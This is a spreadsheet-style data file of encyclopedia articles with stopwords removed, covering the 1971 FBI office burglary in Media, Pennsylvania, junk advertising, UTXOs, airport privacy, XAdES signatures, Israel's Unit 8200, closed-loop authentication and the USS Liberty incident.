1971 (2014). members march 1976, closed investigation group's burglary without conclusively identifying perpetrators. members' identities remained secret early 2014, seven eight could found agreed interviewed journalist betty medsger, writing nonfiction book event: burglary. seven, five agreed publicly identified: keith forsyth, bonnie raines, bonnie's husband john raines (who, years prior burglary, member freedom riders), robert "bob" williamson; mastermind recruiter, william davidon, died 2013 book published planned reveal involvement, well. burglars interviewed hardcover edition chose identified pseudonyms "susan smith" "ron durst". march 2021, recognition 50th anniversary burglary, ralph daniel rafael, calif., revealed burglars.the final burglar, judi feingold, had, unlike others, fled across country 1971 could found years. when discovered burglars breaking silence, contacted robert williamson eventually interviewed medsger well, included epilogue paperback edition burglary.several months burglary, forsyth williamson also members camden separate activist group broke draft board destroy documents, order impede draft make anti-war statement. burglary burglars extensive surveillance office, ensure knew office empty streets unlikely police patrols. break-in perpetrated frazier muhammad ali's fight century. burglars confirmed subsequent interviews done hope building manager residents upstairs would glued radios hear summaries fight. while contracts fight century forbade live television radio coverage, summaries round mutual broadcasting system night fight available public. cointelpro target involvement nation islam anti-war movement.the picture office shown york times' video corresponds veterans media, pa.there surveillance camera historical marker referencing burglary outside former offices. statement 2014 interview, john raines said returning burglary early morning, group stopped phone, called reuters journalist, delivered following statement: night march 1971, citizens' commission investigate removed files media, pennsylvania, office fbi. these files studied determine: one, nature extent surveillance intimidation carried office fbi, particularly groups individuals working just, humane peaceful society. two, determine much fbi's efforts spent relatively minor crimes poor powerless glamorous conviction rate. instead investigating truly serious crimes money influence cause great damage lives many people—crimes profiteering, monopolistic practices, institutional racism, organized crime, mass distribution lethal drugs. finally, three, extent illegal practices fbi, eavesdropping, entrapment, provocateurs informers. study proceeds, results obtained along documents pertaining sent people public life demonstrated integrity, courage commitment democratic values necessary effectively challenge repressive policies fbi. long united states government wages indochina defiance vast majority want troops weapons withdrawn year, extends suffering guise reducing long great economic political power remains concentrated hands small clique subject democratic scrutiny control. then repression, intimidation, entrapment expected. believe destruction democracy democratic society results simply evilness, egoism senility leaders. rather, destruction result certain undemocratic social, economic political institutions. investigation agents working case, never solved, investigation closed five-year statute limitations out.the burglars considered suspects interviewed (including john raines, williamson, "susan smith") cooperate confess. bonnie raines, despite burglar actual facial composite, ironically never named suspect interviewed fbi. judi feingold disappeared hiding. intentionally avoided interviewing leader burglars, bill davidon, unindicted co-conspirator unrelated harrisburg seven case. documentary films documentary film titled 1971 produced mouth productions co-produced laura poitras. world premiere tribeca film festival april 2014. asher smart released short live-action film, media heist, 2018. fiction this burglary historical events fictionalized james ellroy 2009 novel blood's rover, third part underworld trilogy. also global surveillance disclosures, 2013 whistleblowing leak edward snowden york times united states, 1971 case regarding publication pentagon papers detailing involvement vietnam references external links 1971 film johanna hamilton 2014 documentary citizens' commission investigate "the greatest heist you've never heard of"- york times retro report angeles times break-in break-ins from cointelpro snowden, burglars speak after years silence (part national public radio story secret burglary that exposed edgar hoover's fbi, audio; january 2014 york times burglars took f.b.i. abandon shadows mini-documentary mark mazzetti; january 2014 democracy now! interviews: time more than protest": activists admit 1971 burglary that exposed cointelpro (part magazine resisters league this criminal podcast #183 breaking records burglary investigation</t>
  </si>
  <si>
    <t>Unsolicited advertisement</t>
  </si>
  <si>
    <t>unsolicited advertisement comprise limited traditional junk mail ("direct mailing", industry terms) spamming, particular email spam, telemarketing nuisance calls, junk faxes, unsolicited goods, etc.for advertising marketing purposes sent without request.unsolicited advertising usually violates informational self-determination, addresses advertising material delivered explicitly communicated sender addressee, i.e. opt-in done. defines "unsolicited advertisement" material advertising commercial availability quality property, goods, services transmitted person without person’s prior express invitation permission, writing otherwise. whereas traditional postal advertisements produce huge amounts waste paper plastic waste, modern electronic forms consume bandwidth data storage space. various methods exist prevention defense unsolicited advertisements, including opt-out email lists, entry blocking lists, like robinson lists national call registry, etc.. legislation produced countermeasures like telephone consumer protection act. also targeted advertising attention theft references further reading advertising policy marketing advertising: google</t>
  </si>
  <si>
    <t>Unspent transaction output</t>
  </si>
  <si>
    <t>cryptocurrencies, unspent transaction output (utxo) represents amount digital currency authorized account spent another. utxos public cryptography identify transfer ownership holders public/private pairs. utxos formatted recipient's public key, thus restricting ability spend utxo account prove ownership associated private key. utxo spent includes digital signature associated public attached last time sent. each utxo represents chain ownership implemented chain digital signatures going back origin coin. this true whether coin created mining, staking, another minting function defined protocol. bitcoin example cryptocurrency uses utxo model. extended version utxo model (eutxo) used cardano blockchain. utxo model account model many cryptocurrencies utxo model accounts balances. instead, individual coins (utxos) transferred users much like physical coins cash.the utxo model treats currency objects. history utxo stored blocks transferred, find total balance account must scan block find latest utxos point account. utxos valid matter age; necessary acknowledge ownership sent, every block. though nodes single chain must agree block history, relevant blocks single account's balance likely unique account. hand, account model keeps track account respective balance every block added network. this allows account balances checked without scanning historical blocks, increases size block (compression unchanged account balances reduce space requirements). checking account balances quicker, like utxo model, fully verifying origin coins still requires auditing past blocks coin's origin. utxo total utxos present blockchain represents set, every transaction consumes elements creates ones added set. thus, represents coins particular cryptocurrency system. complete utxo summed calculate total supply cryptocurrency given point time.outputs superset utxos. accordingly, utxos subset outputs superset. bitcoin utxo lifespans studied.in case valid blockchain transaction, unspent outputs (and unspent outputs) used fund transactions. requirement unspent outputs used transactions necessary prevent double-spending fraud. reason, inputs blockchain removed utxo transaction occurs, whilst time, outputs create utxos, added utxo set. these unspent transaction outputs used holders private keys; example, persons cryptocurrency wallets) purpose future transactions. origins utxo model attributed finney's reusable proofs work proposal, based adam back's 1997 hashcash proposal. also distributed ledger references</t>
  </si>
  <si>
    <t>Airport privacy</t>
  </si>
  <si>
    <t>airport privacy involves right personal privacy passengers comes screening procedures, surveillance, personal data stored airports. this practice intertwines airport security measures privacy specifically advancement security measures following 9/11 attacks united states global terrorist attacks. several terrorist attacks, 9/11, airports world look advancement technology body baggage screening, detection dogs, facial recognition, biometrics electronic passports. amidst introduction technology security measures airports growing rates travelers rise risk concern privacy. history airport policies before 9/11 terrorist attacks, security measure place u.s. airports metal detectors. metal detector's ability detect metal weapons made inefficient detecting nonmetals liquids, sharp objects, explosives. after 9/11 terrorist attacks united states, transportation security administration (tsa) increased security measures airports. policies made prohibit carry liquids, sharp objects, explosives. airlines instructed passengers arrive hours flight depart traveling domestically hours traveling internationally. after passing screening, passengers selected random additional screening including checks. after incident, involved passenger carrying bomb shoe, security screeners asked passengers remove shoes passing checkpoints. february 2002, officially took responsibility airport security. 2009, airport security measures shaken passenger, commonly known "underwear bomber," smuggled bomb airport facility underwear. before terrorist attacks, percent bags screened. following attacks, bags subject screening.in 2008, european union considered full body scanners overcome challenges metal detectors able detect nonmetal weapons also challenge pat-downs. european commission came consensus passengers must option decline body scanning. technology privacy body screening screening technology advanced detect harmful materials traveler's clothes also detect harmful materials consumed internally. full body scanners advanced imaging technology (ait) introduced u.s. airports 2006. types body screening currently used airports internationally backscatters millimeter wave scanners. backscatters high-speed thin intensity x-ray beam portray digital image individual's body. millimeter wave scanners uses millimeter waves create image based energy reflected individual's body. june 2010, tsa's commissioners report regulated screening must follow framework ensure fundamental rights health provisions travelers. members particular groups including disabled people, transgender people, older people, children, women religious groups experienced additional negative effects privacy. april 2010, letter stated possession 2000 body scanned photos devices claimed unable store data/images.alternative security measures offered travelers wish out-of-body screening. united states european union allow traveler option refusing screening procedures instead pat-down. however, traveler refuses pat-down refused entry secure area airport terminal. baggage screening baggage screening bags entering airport implemented 9/11 terrorist attacks. carry bags typically stages inspection: x-ray screening contents manual inspection security screening operator (sso). manual inspection necessary doubts contents bags. after security checkpoints, carry bags inspected random searches checked bags screened explosives dangerous items sent passenger's respective flight. sniffer dogs/detection dogs detection dogs utilized airports specifically baggage claim sections. role detection prevent substance illegal drugs explosives enter facility leave accuracy physical capacity dogs raised concerns creation sniffer devices. similarly dogs, device also known "chemical sniffers" "electronic noses" used detect trace drugs explosives. odor, although commonly thought connected individual's privacy, unique every individual. every individual characteristic odor known “body odor signature” used identify gender, sexual orientation, health, diet, reveal emotions like fear happiness viewed biological footprint.in lopez ostra spain, european court human rights ruled odor fact effect privacy human rights. camera surveillance future facial recognition surveillance cameras placed strategically around airports ensure safety everyone. increase camera surveillance calls increase amount personally stored data. human machine interface controlled person operates surveillance system assess situation. operator control cameras determines person appear next camera. facial recognition emerging technology measure airport security. facial recognition made camera surveillance. study done palm beach airport showed false alarm rate face recognition surveillance fairly success rate almost came matching. facial recognition super bowl brought concerns connection fourth amendment. facial profiling 2003, effort improve detection terrorist threat, introduced screening passengers observation technique (spot). spot behavioral recognition system looks people conduct facial expressions body movement. behavior detection officers (tbo) stationed airport security checkpoints keep behavior travelers give suspicion malice. spot highly critiqued times used misidentify threat causing intrusive searches travelers based hunch official has. biometric systems biometrics human characteristics unique every individual usually change fingerprints, speech, face, etc. electronic gates, also known e-gates, become common airports ability verify travelers based biometric information. there types privacy concerns discussing e-gates, general privacy system-specific privacy. system-specific privacy focuses beliefs regarding capability system protect privacy. europe first introduced e-gates airport facilities, future airport technology united states points toward e-gates. united states, registered travel programs: register travel (rt) system global entry (ge) system. these programs designed expedite immigration procedures trusted travelers primarily based fingerprint recognition. legality precedence fourth amendment fourth amendment prohibits unreasonable searches seizures also ensuring protection individual's privacy. relationship airport security measures screening pat-downs sparked controversial debate comes fourth amendment. security measures heightened following 9/11 attacks, many travelers voiced opinion measures violation fourth amendment. however, airport officials responded claiming screening measures pat-downs seen violate fourth amendment procedures made condition traveler purchasing airline tickets. addition, fourth amendment create absolute right privacy intrusive searches instead constitutionality search highly based reasonableness security.the privacy 1974 protects personal information processed federal government.the following cases provide examples court rulings intrusive searches: united states montoya hernandez united states montoya hernandez (1985) ruled individual subject intrusive search, body cavity, authorities safety others themselves. this ruling coincides fact person subject additional screening point throughout airport airport authorities feel necessary suspect risk safety. illinois caballes united states place supreme court ruled illinois caballes (2005) united states place (1983) warrantless searches searches acted upon individual without need suspicion. airports, detection dogs conduct searches passengers throughout facility sniff passenger's baggage baggage claim sections. united states guapi united states guapi (1998) ruled police effectively communicate search optional suspect. this type issue occurs regularly airports traveler unaware privacy rights comes unreasonable searches alternative search methods available. texas tenth amendment following implementation enhanced downs airports, state texas challenged federal power passing bills state legislature would criminalize officials conducting downs travelers. texas argued tenth amendment, reserves remaining power, delegated federal government, state people, allowed ensure police powers protect citizens within state. however, 2011, department justice murphy used supremacy clause argue airport security part federal domain cannot controlled changed states laws. also airport security september attacks epassport biometrics full body scanner automated border control system detection homeland security references</t>
  </si>
  <si>
    <t>XAdES</t>
  </si>
  <si>
    <t>xades (short advanced electronic signatures) extensions xml-dsig recommendation making suitable advanced electronic signatures. etsi maintain update xades together. description while xml-dsig general framework digitally signing documents, xades specifies precise profiles xml-dsig making compliant european eidas regulation (regulation electronic identification trust services electronic transactions internal market). eidas regulation enhances repeals electronic signatures directive 1999/93/ec. eidas legally binding member states since july 2014. electronic signature created compliance eidas legal value handwritten signature.an electronic signature, technically implemented based xades status advanced electronic signature. this means uniquely linked signatory; capable identifying signatory; signatory control data used signature creation; identified data attached signature changed signing.a resulting property xades electronically signed documents remain valid long periods, even underlying cryptographic algorithms broken. however, courts obliged accept xades-based electronic signatures evidence proceedings; least compulsory "qualified" signatures. "qualified electronic signature" needs doted digital certificate, encrypted security signature creation device, identity owner signing-certificate must verified according "high" assurance level eidas regulation. profiles xades defines four profiles (forms) differing protection level offered. xades-b-b (basic electronic signature), lowest simplest version containing signedinfo, signaturevalue, keyinfo signedproperties. this form extends definition electronic signature conform identified signature policy. xades-b-t (signature timestamp), timestamp regarding time signing added protect repudiation. xades-b-lt (signature long term data), certificates revocation data embedded allow verification future even original source available. xades-b-lta (signature long term data archive timestamp), using periodical timestamping (e.g. year) compromising prevented could caused weakening previous signatures long-time storage period.in february 2016, etsi publishes document etsi 132-1 v1.1.0 final draft european standard. draft, profiles omitted. also european telecommunications standards institute (etsi) signature cades, advanced electronic signature pades, advanced electronic signature asic, associated signature containers (asic) trusted timestamping references external links xades version 1.1.1 2003 etsi xades version 1.1.1 2002 2002-12 etsi xades version 1.2.2 2004 2004-02 etsi xades version 1.3.2 2006 2003-07 etsi xades version 1.4.1 2009 2006-15 etsi xades version 1.4.2 2010 2012 etsi v1.2.2 technical specification, etsi v1.3.2 etsi v1.4.1 free open-source java library creating/manipulating pades/cades/xades/asic signatures dss: github repository cades, xades asic windows</t>
  </si>
  <si>
    <t>Unit 8200</t>
  </si>
  <si>
    <t>unit 8200 (hebrew: יחידה 8200, yehida shmone -matayim- "unit eight hundred") israeli intelligence corps unit israel defense forces responsible collecting signal intelligence (sigint) code decryption. military publications include references unit 8200 central collection unit intelligence corps, sometimes referred israeli sigint national unit (isnu). subordinate aman, military intelligence directorate. unit composed primarily 18–21 year olds. result youth soldiers unit, shortness service period, unit relies selecting recruits ability rapid adaptation speedy learning. afterschool programs 16–18 year olds, teaching computer coding hacking skills, also serve feeder programs unit. former unit 8200 soldiers have, completing military service, gone founding occupying positions many international companies silicon valley.according director military sciences royal united services institute, "unit 8200 probably foremost technical intelligence agency world stands everything except scale." history unit 8200 established 1952 using primitive surplus american military equipment. originally, called intelligence service unit 515th intelligence service unit. 1954, unit moved jaffa current base glilot junction.according peter roberts, director military sciences royal united services institute, "unit 8200 probably foremost technical intelligence agency world stands everything except scale. they highly focused look certainly focused conduct operations degree tenacity passion experience elsewhere." overview unit 8200 largest unit israel defense forces, comprising several thousand soldiers. comparable function united states' national security agency ministry defense body part united states department defense. subordinate unit 8200 unit hatzav (hebrew name drimia (hebrew: יחידת חצב)), responsible collecting osint intelligence. unit monitors collects military intelligence–related information television, radio, newspapers, internet. translation various items accounts part termed "basic intelligence", collected units. according media reports, unit provides half overall intelligence information israeli intelligence community.the idf's important signal intelligence–gathering installation urim sigint base, part unit 8200. urim located negev desert approximately beersheba. march 2004, commission investigate intelligence network following iraq recommended turning unit civilian national sigint agency, western countries, proposal implemented.unit 8200 staffed primarily 18–21 year conscripts. selection recruitment unit usually occurs screening process high school. however, unit also scouts potential younger recruits after-school computer classes. these after-school computer classes, teaching 16–18 year olds computer coding hacking skills, sometimes feeder programs unit, students receiving invitation letters idf.the year olds selected unit primarily chosen ability teach learn quickly unit access services short time military service period ends. activities 2010, french newspaper monde diplomatique wrote unit 8200 operates large sigint base negev, largest listening bases world, capable monitoring phone calls, emails, communications, throughout middle east, europe, asia, africa, well tracking ships. unit 8200 also reportedly maintains covert listening posts israeli embassies abroad, taps undersea cables, maintains covert listening units palestinian territories, gulfstream jets equipped electronic surveillance equipment.ronen bergman says 2009 book hezbollah bomb, disguised cell phone, picked agents, taken investigation unit 8200's headquarters february 1999. inside laboratory cell phone exploded. unit 8200 soldiers injured.in 2010, york times cited former member united states intelligence community" alleging unit used secret kill switch deactivate syrian defenses operation orchard.in 2014, veterans unit 8200 signed protest letter decrying called electronic surveillance unit's abusive gathering palestinians' private information. response, reservists signed counter-protest letter.according york times, unit 8200's hack kaspersky allowed watch real time russian government hackers searched computers around world american intelligence programs. israelis hacked kaspersky’s network alerted united states broad russian intrusion systems. stuxnet many media reports alleged unit 8200 responsible creation stuxnet computer worm 2010 infected industrial computers, including iranian nuclear facilities. duqu duqu collection computer malware discovered september 2011. alleged creation unit 8200. companies founded alumni former soldiers unit 8200 gone found many companies, among them: also list cyber warfare forces havatzalot program military intelligence directorate training program corps center consciousness operations information security department mamram computer service directorate military intelligence directorate (israel) talpiot program unit technion references external links enter unit 8200: israel arms cyberwar, upi, 2011 unit 8200: israel's cyber agency, july 2015</t>
  </si>
  <si>
    <t>Closed-loop authentication</t>
  </si>
  <si>
    <t>closed-loop authentication, applied computer network communication, refers mechanism whereby party verifies purported identity another party requiring supply copy token transmitted canonical trusted point contact identity. also sometimes used refer system mutual authentication whereby parties authenticate another signing passing back forth cryptographically signed nonce, party demonstrating control secret used certify identity. e-mail authentication closed-loop email authentication useful simple another, weak form identity verification. strong form authentication face host- network-based attacks (where imposter, chuck, able intercept bob's email, intercepting nonce thus masquerading bob.) closed-loop email authentication used parties shared secret relationship (for example, website someone password account website), party lost forgotten secret needs reminded. party still holding secret sends party trusted point contact. common instance usage "lost password" feature many websites, untrusted party request copy account's password sent email, email address already associated account. problem associated variation tendency naïve inexperienced user click email encourages most website authentication systems mitigate permitting unauthenticated password reminders resets email account holder, never allowing user possess password specify one. instances authentication, closed-loop authentication employed access granted identified user would granted anonymous user. this nature relationship user website holds long-term value parties (enough justify increased effort decreased reliability registration process.) also used cases websites attempting impede programmatic registration prelude spamming abusive activities. closed-loop authentication (like types) attempt establish identity. not, however, incompatible anonymity, combined pseudonymity system authenticated party adequate confidence. also category:computer security list computing information-security related articles. information security authentication cryptography</t>
  </si>
  <si>
    <t>USS Liberty incident</t>
  </si>
  <si>
    <t>liberty incident attack united states navy technical research ship (spy ship), liberty, israeli force fighter aircraft israeli navy motor torpedo boats, june 1967, six-day war. combined attack killed crew members (naval officers, seamen, marines, civilian employee), wounded crew members, severely damaged ship. time, ship international waters north sinai peninsula, 25.5 (29.3 47.2 northwest egyptian city arish.israel apologized attack, saying liberty attacked error mistaken egyptian ship. both israeli u.s. governments conducted inquiries issued reports concluded attack mistake israeli confusion ship's identity. others, including survivors attack, rejected conclusions maintain attack deliberate.in 1968, israeli government paid us$3.32 million (equivalent us$25.9 million 2021) u.s. government compensation families killed attack. march 1969, israel paid $3.57 million ($26.4 million 2021) wounded. december 1980, agreed million ($19.7 million 2021) final settlement material damage liberty plus years interest. liberty liberty originally 7,725 long tons (7,849 (light) civilian cargo vessel simmons victory, mass-produced, standard-design victory ship, follow-on series famous liberty ships supplied allies cargo world acquired united states navy converted auxiliary technical research ship (agtr), cover name national security agency (nsa) "spy ships" carrying signals intelligence missions. began first deployment 1965, waters west coast africa. carried several operations next years. attack liberty events leading attack during six-day israel several arab nations, united states america maintained neutral country status. several days began, liberty ordered proceed eastern mediterranean area perform signals intelligence collection mission international waters near north coast sinai, egypt. after erupted, concerns safety approached patrol area, several messages sent liberty increase allowable closest point approach (cpa) egypt's israel's coasts 12.5 nautical miles (14.4 23.2 12.0 km), respectively, nautical miles km), later nautical miles (120 countries. unfortunately, ineffective message handling routing, messages received attack.according israeli sources, start june, general yitzhak rabin, israeli force (iaf) chief staff informed commander ernest carl castle, american naval attaché aviv, israel would defend coast every means disposal, including sinking unidentified ships. asked u.s. keep ships away israel's shore least inform israel exact positions.american sources said inquiry ships area made attack liberty. message sent u.s. secretary state dean rusk u.s. ambassador walworth barbour aviv, israel, rusk asked "urgent confirmation" israel's statement. barbour responded: request info u.s. ships operating sinai made liberty incident." further, barbour stated: "had israelis made inquiry would forwarded immediately chief naval operations high naval commands repeated dept [department state]."with outbreak war, captain william mcgonagle liberty immediately asked vice admiral william martin united states sixth fleet headquarters send destroyer accompany liberty serve armed escort auxiliary communications center. following day, admiral martin replied: "liberty clearly marked united states ship international waters, participant conflict reasonable subject attack nation. request denied." promised, however, unlikely event inadvertent attack, fighters sixth fleet would overhead minutes. meanwhile united nations june, u.s. ambassador arthur goldberg told security council vessels sixth fleet several hundred miles conflict, response egyptian complaints united states supporting israel conflict. when statement made, fact true; liberty, assigned sixth fleet, central mediterranean sea, passing libya crete. would ultimately steam north sinai peninsula.on night june washington time, early morning june, 01:10z 3:10 local time, pentagon issued order sixth fleet headquarters tell liberty come closer nautical miles (120 israel, syria, sinai coast (oren, 263).: (exhibit according naval court inquiry: national security agency official history, order withdraw sent radio frequency liberty monitored orders 15:25 zulu, several hours attack, long series administrative message routing problems. navy said large volume unrelated high-precedence traffic, including intelligence intercepts related conflict, handled time; combined shortage qualified radiomen contributed delayed transmission withdrawal message.: visual contact official testimony combined liberty deck establish throughout morning attack, june, ship overflown, various times locations, aircraft. primary aircraft type nord noratlas; also unidentified delta-wing jets 9:00 sinai time (gmt+2). liberty crewmembers noratlas aircraft flew close liberty noise propellers rattled ship's deck plating, pilots crewmembers waved other. later reported, based information sources, over-flights coincidental, aircraft hunting egyptian submarines spotted near coast. 5:45 sinai time, ship-sighting report received israeli central coastal command (ccc) respect liberty, identified aerial naval observer "apparently destroyer, sailing miles [110 west gaza". vessel's location marked control table, using marker, indicating unidentified vessel. 6:00 aerial naval observer, major meretz, reported ship appeared u.s. navy supply ship; 9:00 marker replaced green marker indicate neutral vessel. about time, israeli fighter pilot reported ship miles north arish fired aircraft tried identify vessel. israeli naval command dispatched destroyers investigate, returned previous positions 9:40 doubts emerged pilot's debriefing. after naval observer's noratlas landed debriefed, ship identified liberty, based "gtr-5" hull markings. liberty's marker removed ccc's control table 11:00 positional information considered date.at 11:24 israeli chief naval operations received report arish shelled sea. inquiry source report ordered determine validity. report came support officer arish. additionally, 11:27 israeli supreme command head operations received report stating ship shelling arish, shells fallen short. (the investigative journalist james bamford points liberty four caliber machine guns mounted decks thus could shelled coast.) head operations ordered report verified, determined whether israeli navy vessels coast arish. 11:45 another report arrived supreme command saying ships approaching arish coast. shelling ship reports passed supreme command fleet operations control center. chief naval operations took seriously, 12:05 torpedo boat division ordered patrol direction arish. division 914, codenamed "pagoda", command commander moshe oren. consisted three torpedo boats numbered: t-203, t-204 t-206. 12:15 division received orders patrol position miles north arish. commander oren headed toward arish, informed naval operations reported shelling arish told aircraft would dispatched area target detected. chief staff yitzhak rabin concerned supposed egyptian shelling prelude amphibious landing could outflank israeli forces. rabin reiterated standing order sink unidentified ships area, advised caution, soviet vessels reportedly operating nearby. 1:41 torpedo boats detected unknown vessel miles northwest arish miles coast bardawil. ship's speed estimated radars. combat information center officer t-204, ensign aharon yifrah, reported oren target detected range miles km), speed tracked minutes, determined target moving westward speed knots km/h; mph). these data forwarded fleet operations control center.the speed target significant indicated target combat vessel. moreover, israeli forces standing orders fire unknown vessels sailing area knots km/h; mph), speed which, time, could attained warships. chief naval operations asked torpedo boats double-check calculations. yifrah twice recalculated confirmed assessment. minutes later, commander oren reported target, miles position, moving speed knots km/h; mph) different heading. bamford, however, points liberty's speed knots. sources time attack liberty following signal-intercept mission course along northern sinai coast, knots (9.3 km/h; mph) speed.the data ship's speed, together direction, gave impression egyptian destroyer fleeing toward port shelling arish. torpedo boats gave chase, expect overtake target reached egypt. commander oren requested israeli force dispatch aircraft intercept. 1:48 chief naval operations requested dispatch fighter aircraft ship's location. dispatched flight mirage fighter jets codenamed kursa flight arrived liberty 2:00 formation leader, captain iftach spector, attempted identify ship. radioed torpedo boats observation ship looked like military ship smokestack mast. also communicated, effect, ship appeared like destroyer another type small ship. post-attack statement, pilots said distinguishable markings flag ship.at point, recorded exchange took place command headquarters weapons systems officer, controllers, chief controller questioning possible american presence. immediately exchange, 1:57 chief controller, lieutenant-colonel shmuel kislev, cleared mirages attack. attacks after cleared attack, mirages dove ship attacked 30-mm cannons rockets. attack came minutes crew completed chemical attack drill, captain mcgonagle command bridge. crew "stand-down mode", helmets life jackets removed. battle readiness "modified condition three" set, meant ship's four caliber machine guns manned ammunition ready loading firing. eight crewmen either killed immediately received fatal injuries died later, wounded. among wounded mcgonagle, right thigh arm. during attack, antennas severed, drums caught fire, ship's flag knocked down. mcgonagle sent urgent request help sixth fleet, "under attack unidentified aircraft, require immediate assistance". mirages left expending ammunition, replaced flight dassault super mystères codenamed royal flight. mysteres armed napalm bombs, flown captain yossi wingman, yaakov hamermish. mysteres released payloads ship strafed cannons. much ship's superstructure caught fire. mysteres readying attack israeli navy, alerted absence return fire, warned kislev target could israeli. kislev told pilots attack doubt identification, israeli navy quickly contacted vessels area. israeli navy found none vessels fire, aircraft cleared attack. however, kislev still disturbed lack return fire requested last attempt identify ship. captain made attempt identification strafing ship. reported seeing flag, ship's gtr-5 marking. kislev immediately ordered attack stopped. kislev guessed ship american. fact ship latin alphabet markings chief staff rabin fear ship soviet. though egyptian warships known disguise identities western markings, usually displayed arabic letters numbers only. rabin ordered torpedo boats remain safe distance ship, sent aérospatiale super frelon helicopters search survivors. these radio communications recorded israel. order also recorded torpedo boat's log, although commander oren claimed received order cease fire given 2:20 twenty-four minutes torpedo boats arrived liberty's position.during interval, crewmen aboard liberty hoisted large american flag. during early part attack torpedo boats sighted, liberty sent distress message received sixth fleet aircraft carrier saratoga. aircraft carrier america dispatched eight aircraft. carrier middle strategic exercises. vice-admiral william martin recalled aircraft minutes later. mcgonagle testified naval court inquiry latter moments attack, noted three high speed boats approaching ship northeast relative bearing approximately [degrees] distance [nautical] miles. ship time still [westward] course [degrees] true, speed unknown, believed excess five knots.: mcgonagle testified "believed time initial sighting torpedo boats 14:20", "boats appeared wedge type formation center boat lead point wedge. estimated speed boats knots km/h]", "appeared approaching ship torpedo launch attitude".: when torpedo boats arrived, commander oren could ship could destroyer supposedly shelled arish ship capable knots km/h) speed. according michael limor, israeli naval reservist serving torpedo boats, attempted contact ship heliograph radio, received response. 6,000 meters (20,000 ft), t-204 paused signalled "aa", means "identify yourself". damaged equipment, mcgonagle could reply using handheld aldis lamp. oren recalled receiving similar response ibrahim awal, egyptian destroyer captured israel suez crisis, convinced facing enemy ship. consulted israeli identification guide arab fleets concluded ship egyptian supply ship quseir, based observing deckline, midship bridge smokestack. captain boat t-203 reached conclusion independently. boats moved battle formation, attack. torpedo boats rapidly approached, captain mcgonagle ordered sailor proceed machine mount open fire.: however, noticed boats appeared flying israeli flag, "realized possibility aircraft israeli attack conducted error".: captain mcgonagle ordered mount hold fire, short burst fired torpedo boats understood order.: mcgonagle observed machine mount began firing center torpedo boat time mount fired, fire "extremely effective blanketed area center torpedo boat".: machine mount located starboard amidships side, behind pilot house.: mcgonagle could "get mount starboard wing bridge".: "sent lucas around port side bridge, around skylights, could tell [seaman] quintero, [he] believed gunner machine hold fire".: ensign lucas "reported back minutes effect mount 53".: lucas, left command bridge attack returned assist captain mcgonagle,: believed sound gunfire likely ammunition cooking off, nearby fire.: previously, lucas granted request quintero fire torpedo boats, heat nearby fire chased mount 53.: mcgonagle later testified, court inquiry, likely "extremely effective" firing event observed.: after coming fire, torpedo boats returned fire cannons, killing liberty's helmsman. torpedo boats launched five torpedoes liberty. 1235z (2:35 local time) torpedo liberty starboard side forward superstructure, creating wide hole cargo hold converted ship's research spaces killing servicemen, almost intelligence section, wounding dozens. said torpedo major hull frame absorbed much energy; crew members reported torpedo missed frame liberty would split two. four torpedoes missed ship.the torpedo boats closed strafed ship's hull cannons machine guns. according crewmen, torpedo boats fired damage control parties sailors preparing life rafts launch. (see disputed details below.) life raft floated ship picked t-203 found bear navy markings. t-204 circled liberty, oren spotted designation gtr-5, flag. took 3:30 establish ship's identity. shortly liberty's identity confirmed, saratoga launched eight aircraft armed conventional weapons towards liberty. after ship's identity confirmed, general staff notified apology sent naval attaché castle. aircraft approaching liberty recalled saratoga. aftermath attack according transcripts intercepted radio communications, published u.s. national security agency, 2:30 near beginning torpedo boat attack, helicopters dispatched liberty's location. helicopters arrived 3:10 minutes torpedo ship. after arriving, helicopter pilots asked ground-based controller verify ship flying american flag. helicopters conducted brief search crew members ship might fallen overboard attack. found. helicopters left ship 3:20 hours attack began, israel informed u.s. embassy aviv military forces mistakenly attacked u.s. navy ship. when ship "confirmed american" torpedo boats returned 4:40 offer help; refused liberty. later, israel provided helicopter u.s. naval attaché commander castle ship. (pp. washington, president lyndon johnson received word joint chiefs staff liberty torpedoed unknown vessel 9:50 eastern time. johnson assumed soviets involved, hotlined moscow news attack dispatch jets saratoga. chose make public statements delegated task phil goulding, assistant secretary defense public affairs time. soon afterward, israelis said mistakenly attacked ship. johnson administration conveyed "strong dismay" israeli ambassador avraham harman. meanwhile, apologies soon sent israeli prime minister levi eshkol, foreign minister abba eban, chargé d'affaires ephraim evron. within hours, israel offered compensate victims families.though liberty severely damaged, wide high hole twisted keel, crew kept afloat, able leave area power. liberty later destroyers davis massey, cruiser little rock. medical personnel transferred liberty, escorted malta, given interim repairs. after completed july 1967, liberty returned u.s. decommissioned june 1968 struck naval vessel register. liberty transferred united states maritime administration (marad) december 1970 sold scrap 1973. from start, response israeli statements mistaken identity ranged frank disbelief unquestioning acceptance within administration washington. communication israeli ambassador june, secretary rusk stated, among things: time attack, liberty flying american flag identification clearly indicated large white letters numerals hull. experience demonstrates flag identification number vessel readily visible accordingly, every reason believe liberty identified, least nationality determined, israeli aircraft approximately hour attack. subsequent attack torpedo boats, substantially vessel identified israeli military forces, manifests reckless disregard human life. george lenczowski notes: significant that, contrast secretary state, president johnson fully accepted israeli version tragic incident." notes johnson included small paragraph liberty autobiography, accepted israeli explanation, minimized affair distorted number dead wounded, lowering 100, respectively. lenczowski states: seems johnson interested avoiding possible confrontation soviet union, restraining israel." mcgonagle received medal honor, highest u.s. medal, actions. medal honor generally presented president united states white house, time awarded washington navy yard secretary navy unpublicized ceremony. other liberty sailors received decorations actions attack, award citations omitted mention israel perpetrator. 2009, however, silver star awarded crewmember terry halbardier, braved machine-gun cannon fire repair damaged antenna restored ship's communication; award citation israel named attacker. investigations attack there several investigations conducted incident u.s. navy, joint chiefs staff, cia, u.s. house senate, nsa, israeli government. investigations matter similarly blamed lack communications found reason anyone involved face criminal charges. u.s. government investigations court produced evidence israeli armed forces ample opportunity identify liberty correctly. court insufficient information make judgment reasons decision israeli aircraft motor torpedo boats attack responsibility court rule culpability attackers, evidence heard attacking nation. american inquiries, memoranda, records testimony, various reports involving mentioning liberty attack include, limited following: u.s. naval court inquiry june 1967 joint chief staff's report june 1967 intelligence memorandums june 1967 clark clifford report july 1967 senate foreign relations committee testimony hearings 1967 foreign authorization bill, july 1967 house armed services committee investigation 1971 history report 1981the u.s. naval court inquiry record contains testimony liberty crew members, exhibits attack damage photographs, various reports. court concluded testimony record revealed shallow investigation, plagued myriad disagreements captain crew". according navy court inquiry's record proceedings, four days spent hearing testimony: days fourteen survivors attack several u.s. navy expert witnesses, partial days expert u.s. navy witnesses. testimony heard israeli personnel involved.the official u.s. records liberty incident designated top-secret closed general public. 